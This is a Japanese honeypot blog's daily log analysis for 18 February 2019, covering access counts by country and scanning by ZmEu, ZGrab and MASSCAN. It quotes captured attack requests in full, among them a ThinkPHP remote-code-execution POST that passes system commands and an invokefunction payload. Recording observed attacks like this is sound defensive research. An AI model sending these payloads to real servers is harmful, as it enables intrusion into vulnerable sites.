cute_otter’s blog

ハニーポットの観察日記を付けています

トップ > ハニーポット観察日記 > ハニーポット観察日記(2019/02/18)

ハニーポット観察日記(2019/02/18)

ハニーポット観察日記

WOWHoneypot

ハニーポット「WOWHoneypot」で2019/02/18 (月) 00:00~23:59 UTC(運用46日目)に取得したログの簡易分析です。

特徴

  • 2019/02/15以来、3日ぶりにThinkPHPの探査と脆弱性を利用した攻撃を観測しました。
  • 2019/01/10以来、45日ぶりにZmEuによるスキャンを観測しました。
  • 9日連続でZGrabによるスキャンを観測しました。
  • 2019/02/14以来、4日ぶりにMASSCANによるスキャンを観測しました。
  • Viaヘッダが設定されたHTTPリクエストを初めて観測しました。

概況

  • 集計期間 : 2019/02/18 (月) 00:00~23:59 UTC
  • 総アクセス件数 : 61 件(前日比 +13 件)
    • トップページへのアクセス : 42 件
    • ZmEuによるスキャン : 6 件
      • スキャン開始の合図 : 1 件
      • phpMyAdminの探査 : 5 件
    • phpMyAdminの探査(ZmEuによるスキャン以外) : 2 件
    • robots.txtの探査 : 2 件
    • サイトマップの探査 : 2 件
    • SSL証明書(ファイル認証方式)の発行の際に生じる一時ファイルの探査 : 2 件
    • ファビコンの探査 : 2 件
    • ThinkPHPの脆弱性を利用した攻撃(参照) : 2 件
    • ThinkPHPの探査 : 1 件
  • ユニークIPアドレス件数 : 42 件 (前日比 -5 件)
  • アクセス元の国数 : 22 カ国 (前日比 -4 カ国)

国別のアクセス件数

国別のアクセス件数は以下の通りです。

順位 国名 件数 前日の順位 前日の件数 件数差 備考
1. United States 9 6. 2 +7 -
2. Taiwan 6 1. 8 -2 -
3. China 6 26. 1 +5 -
4. Netherlands 5 - 0 +5 -
5. India 4 20. 1 +3 -
6. Vietnam 4 2. 7 -3 -
7. Germany 4 19. 1 +3 -
8. Italy 3 - 0 +3 -
9. Ukraine 3 - 0 +3 -
10. Greece 2 - 0 +2 -
11. Thailand 2 - 0 +2 -
12. Bangladesh 2 13. 1 +1 -
13. Brazil 2 3. 5 -3 -
14. Romania 1 25. 1 +-0 -
15. Denmark 1 - 0 +1 -
16. Spain 1 - 0 +1 -
17. Russia 1 7. 2 -1 -
18. Pakistan 1 8. 1 +-0 -
19. Nigeria 1 11. 1 +-0 -
20. Czechia 1 - 0 +1 -
21. South Africa 1 - 0 +1 -
22. Hungary 1 - 0 +1 -

アクセス先

  • 2019/02/15以来、3日ぶりにThinkPHPの探査と脆弱性を利用した攻撃を観測しました。
    • 件数は3件でした。
      • 探査が1件、脆弱性を利用した攻撃が2件でした。
      • 脆弱性を利用した攻撃のうち1件は初めて観測するパスへの攻撃でした。
    • 送信元IPアドレスは、前回の探査の時のものとは異なっていました。
  • 2019/01/10以来、45日ぶりにZmEuによるスキャンを観測しました。
    • 件数は6件でした。
    • User-AgentはZmEuでした。
  • 9日連続でZGrabによるスキャンを観測しました。
    • 件数は1件でした。
    • User-AgentはMozilla/5.0 zgrab/0.xでした。
  • 2019/02/14以来、4日ぶりにMASSCANによるスキャンを観測しました。
    • 件数は1件でした。
    • User-Agentはmasscan/1.0 (https://github.com/robertdavidgraham/masscan)でした。
  • Viaヘッダが設定されたHTTPリクエストを初めて観測しました。

ThinkPHPの脆弱性を利用した攻撃

今回初めて観測するパスへの攻撃のHTTPリクエストは以下の通りです。
unameコマンドとipconfigコマンドを実行しようとしていました。

POST /TP/public/index.php?s=captcha HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Go-http-client/1.1
Content-Length: 84
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=uname&ipconfig
  • 一部情報を伏せています。

Viaヘッダが設定されたHTTPリクエス

Viaヘッダが設定されたHTTPリクエストを初めて観測しました。
ホスト名にNetScalerという文字列が含まれていました。

GET / HTTP/1.0
Host: xxx.xxx.xxx.xxx
Via: HTTP/1.0 ホスト名
  • 一部情報を伏せています。

アクセス先一覧

アクセス先の一覧は以下の通りです。

順位 備考 アクセス先 件数 前日の順位 前日の件数 件数差
1. トップページへのアクセス GET / HTTP/1.0 24 1. 31 -7
2. トップページへのアクセス GET / HTTP/1.1 18 2. 15 +3
3. phpMyAdminの探査(ZmEuによるスキャン以外) GET /mysql/admin/index.php?lang=en HTTP/1.1 2 - 0 +2
4. robots.txtの探査 GET /robots.txt HTTP/1.1 2 - 0 +2
5. サイトマップの探査 GET /sitemap.xml HTTP/1.1 2 - 0 +2
6. SSL証明書(ファイル認証方式)の発行の際に生じる一時ファイルの探査 GET /.well-known/security.txt HTTP/1.1 2 - 0 +2
7. ファビコンの探査 GET /favicon.ico HTTP/1.1 2 - 0 +2
8. ZmEuによるスキャン(スキャン開始の合図) GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1 1 - 0 +1
9. phpMyAdminの探査(ZmEuによるスキャン) GET /phpMyAdmin/scripts/setup.php HTTP/1.1 1 - 0 +1
10. phpMyAdminの探査(ZmEuによるスキャン) GET /phpmyadmin/scripts/setup.php HTTP/1.1 1 - 0 +1
11. phpMyAdminの探査(ZmEuによるスキャン) GET /pma/scripts/setup.php HTTP/1.1 1 - 0 +1
12. phpMyAdminの探査(ZmEuによるスキャン) GET /myadmin/scripts/setup.php HTTP/1.1 1 - 0 +1
13. phpMyAdminの探査(ZmEuによるスキャン) GET /MyAdmin/scripts/setup.php HTTP/1.1 1 - 0 +1
14. ThinkPHPの探査 GET /TP/public/index.php HTTP/1.1 1 - 0 +1
15. ThinkPHPの脆弱性を利用した攻撃(参照) GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1 1 - 0 +1
16. ThinkPHPの脆弱性を利用した攻撃(参照) POST /TP/public/index.php?s=captcha HTTP/1.1 1 - 0 +1

WOWHoneypotで取得したログの簡易分析は以上です。